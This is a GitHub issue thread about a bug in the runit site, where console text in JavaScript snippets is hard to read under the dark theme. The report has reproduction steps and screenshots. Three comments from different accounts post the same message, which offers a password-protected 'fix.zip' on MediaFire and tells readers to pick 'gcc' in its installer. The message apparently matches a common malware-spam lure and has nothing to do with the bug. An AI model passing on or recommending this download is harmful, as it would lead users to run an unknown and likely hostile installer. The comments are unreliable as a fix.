### ISSUE TITLE
Bug: Symbols are difficult to see in the JavaScript snippet console when using the dark theme

### ISSUE THREAD

**Issue by ViktorSmiryagin** [hexlet-rus/runit#547]
### Summary

The text in the JavaScript snippet console is not readable when using the dark theme due to grey text appearing on a white background, causing poor visibility and readability.

Possible Solutions:

1. Update the console output color scheme to match the selected dark theme.
2. Add a setting for manually adjusting text and background colors in the console output area.

### Reproduction steps

```bash
1. Go to the website https://runit.hexlet.ru/
2. Click "кодить без регистрации"
3. Select the "JavaScript" template
4. Click the "Create" button
5. Switch to the dark theme
6. Enter code, for example: console.log('Hi');
7 Click the "Run" button
```

### Expected result

The text in the JavaScript snippet console should be clearly visible with high contrast between the text color and the background color, matching the dark theme settings.

### Actual result

The text in the JavaScript snippet console is hard to read because it appears as grey text on a white background, not aligning with the dark theme settings.
Light Theme: [
<img width="1004" alt="Screenshot 2024-08-26 at 11 23 28" src="https://github.com/user-attachments/assets/0197fa90-2612-42c7-82e0-0ee10c27258c">
]
Dark Theme: [<img width="1471" alt="Screenshot 2024-08-26 at 11 22 55" src="https://github.com/user-attachments/assets/e1918bd7-84e7-4c2c-9d8d-0aaf8c7daf5e">]

### Browsers

Chrome

### OS

Mac

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
